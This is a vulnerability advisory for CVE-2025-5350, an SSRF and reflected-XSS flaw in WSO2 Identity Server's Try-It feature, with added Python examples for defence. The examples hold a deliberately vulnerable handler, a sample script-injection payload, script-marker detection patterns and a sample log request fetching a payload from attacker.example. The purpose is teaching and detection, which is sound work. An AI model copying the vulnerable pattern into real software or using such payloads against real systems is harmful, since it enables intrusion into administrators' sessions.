
CVE-2025-5350: CWE-918 Server-Side Request Forgery (SSRF) in WSO2 Identity Server

Severity: Medium
Type: Vulnerability
Tags: CVE-2025-5350, CWE-918, CWE-79
Published: Fri Oct 24 2025 (10/24/2025, 10:08:07 UTC)
Source: CVE Database V5
Vendor/Project: WSO2
Product: WSO2 Identity Server

Description

SSRF and Reflected XSS Vulnerabilities exist in multiple WSO2 products within the deprecated Try-It feature, which was accessible only to administrative users. This feature accepted user-supplied URLs without proper validation, leading to server-side request forgery (SSRF). Additionally, the retrieved content was directly reflected in the HTTP response, enabling reflected cross-site scripting (XSS) in the admin user's browser context. By tricking an administrator into accessing a crafted link, an attacker could force the server to fetch malicious content and reflect it into the admin’s browser, leading to arbitrary JavaScript execution for UI manipulation or data exfiltration. While session cookies are protected with the HttpOnly flag, the XSS still poses a significant security risk. Furthermore, SSRF can be used by a privileged user to query internal services, potentially aiding in internal network enumeration if the target endpoints are reachable from the affected product.

AI-Powered Analysis

AI analysis last updated: 10/24/2025, 10:12:39 UTC

Technical Analysis

CVE-2025-5350 is a vulnerability identified in multiple versions of WSO2 Identity Server (5.10.0 through 7.1.0) that combines server-side request forgery (SSRF) and reflected cross-site scripting (XSS) vulnerabilities within the deprecated Try-It feature. This feature, accessible only to administrative users, accepts user-supplied URLs without proper validation, allowing an attacker to force the server to make arbitrary HTTP requests to internal or external resources. The content retrieved by these requests is then directly reflected in the HTTP response to the administrator’s browser, enabling reflected XSS attacks. This XSS can execute arbitrary JavaScript in the context of the admin user’s session, potentially leading to UI manipulation or data exfiltration, although session cookies are protected by the HttpOnly flag, limiting cookie theft. The SSRF component also poses a risk by enabling privileged users to query internal services that may not be otherwise accessible, aiding internal network enumeration and potentially facilitating further attacks. Exploitation requires tricking an administrator into opening a maliciously crafted link; beyond that click, no further user interaction is needed. The vulnerability has a CVSS 3.1 base score of 5.9, indicating medium severity due to the need for high privileges but low attack complexity and the potential for confidentiality, integrity, and availability impacts. No public exploits are currently known, and no patches have been linked yet, emphasizing the need for immediate mitigation steps. The vulnerability is tracked under CWE-918 (SSRF) and CWE-79 (Reflected XSS).
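The Description and Technical Analysis above both describe the same pattern: an admin-only "fetch this URL and show me what came back" feature that neither validates the target (CWE-918) nor escapes the fetched body before echoing it (CWE-79). The following is an added example written for this page, not WSO2 code and not the real Try-It handler: a generic handler in its vulnerable form beside a hardened form that rejects non-public targets before fetching and serves the upstream body as escaped text rather than markup. The `fake_fetch` body and `FAKE_DNS` table are constructed so the demo runs offline; the real handler's names and endpoint are not reproduced here.

```python
"""Added example (not WSO2 code): a generic 'fetch this URL and show me the
response' handler in its vulnerable form and in a hardened form.

Assumptions: the fetcher is injected so the demo runs offline, and the resolver
is injectable so the address checks can be exercised without live DNS."""
import html
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def vulnerable_try_it(user_url: str, fetch) -> str:
    """Vulnerable pattern: no target validation (CWE-918) and the fetched body
    is dropped straight into an HTML page (CWE-79)."""
    body = fetch(user_url)
    return f"<html><body><h1>Response</h1>{body}</body></html>"


def resolve_host(host: str) -> str:
    """Return an IP string for `host`; IP literals pass through untouched."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return socket.gethostbyname(host)


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses: loopback, RFC 1918,
    link-local (169.254/16, fe80::/10), CGNAT, documentation ranges and
    multicast are all rejected by the ipaddress module's is_global check."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def validate_target(url: str, resolve=resolve_host) -> str:
    """Raise ValueError unless `url` is an http(s) URL whose host resolves to a
    public address. Returns the resolved IP so the caller can connect to that
    exact address (re-resolving at fetch time reopens the DNS-rebinding window)."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {parsed.scheme or '(none)'!r} not allowed")
    if not parsed.hostname:
        raise ValueError("missing host")
    if parsed.username or parsed.password:
        raise ValueError("credentials in URL not allowed")
    ip = resolve(parsed.hostname)
    if not is_public_address(ip):
        raise ValueError(f"{parsed.hostname} resolves to non-public address {ip}")
    return ip


def hardened_try_it(user_url: str, fetch, resolve=resolve_host):
    """Hardened pattern: validate the target before fetching, and never serve the
    fetched bytes as markup. Returns (status, headers, body)."""
    try:
        validate_target(user_url, resolve)
    except ValueError as exc:
        return 400, {"Content-Type": "text/plain; charset=utf-8"}, f"rejected: {exc}"
    body = fetch(user_url)
    headers = {
        "Content-Type": "text/plain; charset=utf-8",    # rendered as text, not HTML
        "X-Content-Type-Options": "nosniff",            # browser must not re-sniff it
        "Content-Security-Policy": "default-src 'none'",
    }
    return 200, headers, html.escape(body)


# Constructed stand-ins so the demo runs offline (not real upstream data or DNS).
def fake_fetch(url: str) -> str:
    return "<script>alert(document.title)</script>"   # a hostile upstream body


FAKE_DNS = {"api.example.com": "8.8.8.8", "intranet.corp.example": "10.0.0.5"}


def fake_resolve(host: str) -> str:
    return FAKE_DNS.get(host) or resolve_host(host)


if __name__ == "__main__":
    print(vulnerable_try_it("http://api.example.com/", fake_fetch))
    for u in ("http://api.example.com/", "http://127.0.0.1:9443/",
              "http://intranet.corp.example/", "file:///etc/hosts"):
        print(u, "->", hardened_try_it(u, fake_fetch, fake_resolve)[0])
```

Two design points worth noting: the address check happens on the resolved IP, and the fetch should reuse that IP (or be pinned to it) rather than resolving again, otherwise a rebinding DNS record passes validation and then points the second lookup at an internal host; and redirects returned by the upstream must be re-validated with the same check, since a public host can 302 to a private one. Serving the body as `text/plain` with `nosniff` removes the reflected-XSS half of the issue regardless of what the upstream returns.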

Potential Impact

For European organizations, this vulnerability presents a significant risk primarily in environments where WSO2 Identity Server is deployed for identity and access management. The SSRF aspect can allow attackers or malicious insiders with administrative access to probe internal network services, potentially exposing sensitive internal infrastructure details or accessing restricted services. The reflected XSS can lead to arbitrary script execution in the administrator’s browser, risking UI manipulation, unauthorized actions, or data leakage within the administrative context. Although session cookies are protected, the XSS still enables impactful attacks such as credential theft through means other than cookie theft, phishing, or manipulation of administrative workflows. This could lead to compromised identity management, unauthorized access, and potential lateral movement within the network. Given the critical role of identity servers in authentication and authorization, exploitation could disrupt business operations and compromise sensitive data. The medium CVSS score reflects moderate risk, and the requirement for administrative privileges and user interaction (clicking a crafted link) somewhat limits the attack surface. However, targeted attacks against high-value European organizations, especially those with large internal networks or complex identity infrastructures, could have serious consequences.

Mitigation Recommendations

European organizations should immediately disable the deprecated Try-It feature in affected WSO2 Identity Server versions to eliminate the attack vector. If disabling is not feasible, restrict access to the administrative interface strictly to trusted networks and users, employing network segmentation and multi-factor authentication to reduce the risk of administrator compromise. Monitor administrative user activity for suspicious link clicks or unusual behavior. Implement web application firewalls (WAFs) with rules to detect and block SSRF and reflected XSS patterns targeting the Try-It feature endpoints. Regularly audit and update WSO2 Identity Server to the latest versions once patches become available. Conduct internal network scans to identify and secure any internal services that could be exposed via SSRF. Educate administrators about phishing risks and the dangers of clicking untrusted links, especially within administrative contexts. Finally, implement robust logging and alerting on administrative actions and unusual HTTP requests to detect exploitation attempts early.
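The recommendations above call for WAF rules against the Try-It endpoints and for logging and alerting on unusual HTTP requests. The following is an added example written for this page (not WSO2 tooling): a small detector that reads access-log lines, picks out requests to a URL-fetching admin endpoint, and flags any whose supplied target points at a non-public address or carries inline-script markers, which is the pair of patterns the advisory describes. The endpoint path `/carbon/tryit`, the `url` parameter name and every log line are placeholders constructed for the demo; substitute the real path and parameter from your deployment's access logs.

```python
"""Added example (not WSO2 code): flag access-log requests to a URL-fetching
admin endpoint whose supplied target is a non-public address or carries script
markers. TRYIT_PATH and URL_PARAM are PLACEHOLDERS, not the real endpoint."""
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

TRYIT_PATH = "/carbon/tryit"      # placeholder path; take the real one from your logs
URL_PARAM = "url"                 # placeholder parameter name
SCRIPT_MARKERS = ("<script", "javascript:", "onerror=", "onload=", "<svg", "<iframe")

# Common/combined log format: client ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def is_non_public_host(host: str) -> bool:
    """IP literals: anything not globally routable. Names: a small heuristic for
    obviously internal labels (no DNS resolution is done during log analysis)."""
    try:
        addr = ipaddress.ip_address(host)
        return (not addr.is_global) or addr.is_multicast
    except ValueError:
        h = host.lower()
        return h == "localhost" or h.endswith((".internal", ".local", ".localhost"))


def classify_target(target: str) -> list:
    """Return the reasons a fetched target looks suspicious (empty list if none)."""
    reasons = []
    p = urlparse(target)
    if p.scheme not in ("http", "https"):
        reasons.append(f"scheme:{p.scheme or 'none'}")
    if p.hostname and is_non_public_host(p.hostname):
        reasons.append(f"internal-target:{p.hostname}")
    low = target.lower()
    if any(m in low for m in SCRIPT_MARKERS):
        reasons.append("script-marker")
    return reasons


def analyse(lines, tryit_path=TRYIT_PATH, url_param=URL_PARAM):
    """Scan log lines and return one finding per suspicious fetch request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        if path != tryit_path:
            continue
        # parse_qs percent-decodes the value once, so the target is seen as the server saw it
        for target in parse_qs(query).get(url_param, []):
            reasons = classify_target(target)
            if reasons:
                findings.append({
                    "ts": m["ts"], "client": m["client"], "user": m["user"],
                    "status": int(m["status"]), "target": target, "reasons": reasons,
                })
    return findings


# Constructed sample log lines (not from any real system).
SAMPLE_LOG = [
    '10.1.2.3 - admin [24/Oct/2025:10:08:07 +0000] "GET /carbon/tryit?url=https%3A%2F%2Fapi.example.com%2Fwsdl HTTP/1.1" 200 512',
    '10.1.2.3 - admin [24/Oct/2025:10:09:10 +0000] "GET /carbon/tryit?url=http%3A%2F%2F127.0.0.1%3A9443%2Fcarbon%2F HTTP/1.1" 200 88',
    '10.1.2.3 - admin [24/Oct/2025:10:09:30 +0000] "GET /carbon/tryit?url=http%3A%2F%2F10.0.0.5%3A8080%2Fadmin HTTP/1.1" 200 2048',
    '203.0.113.9 - admin [24/Oct/2025:10:10:00 +0000] "GET /carbon/tryit?url=http%3A%2F%2Fattacker.example%2Fpayload.html%3Fx%3D%3Cscript%3E HTTP/1.1" 200 301',
    '10.1.2.3 - admin [24/Oct/2025:10:11:00 +0000] "GET /carbon/login HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f['ts']} {f['user']}@{f['client']} -> {f['target']}  [{', '.join(f['reasons'])}]")
```

Run against the constructed sample, this reports the loopback and RFC 1918 targets and the request carrying a `<script` marker, and ignores the ordinary external fetch and the unrelated login request. A 200 status on a flagged line is the signal to escalate: it means the server actually completed the fetch, which is what the Try-It feature did before it was disabled.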


Technical Details

Data Version
5.1
Assigner Short Name
WSO2
Date Reserved
2025-05-30T06:56:02.711Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 68fb50f0c5193890929c8392

Added to database: 10/24/2025, 10:12:00 AM

Last enriched: 10/24/2025, 10:12:39 AM

Last updated: 10/24/2025, 1:57:55 PM
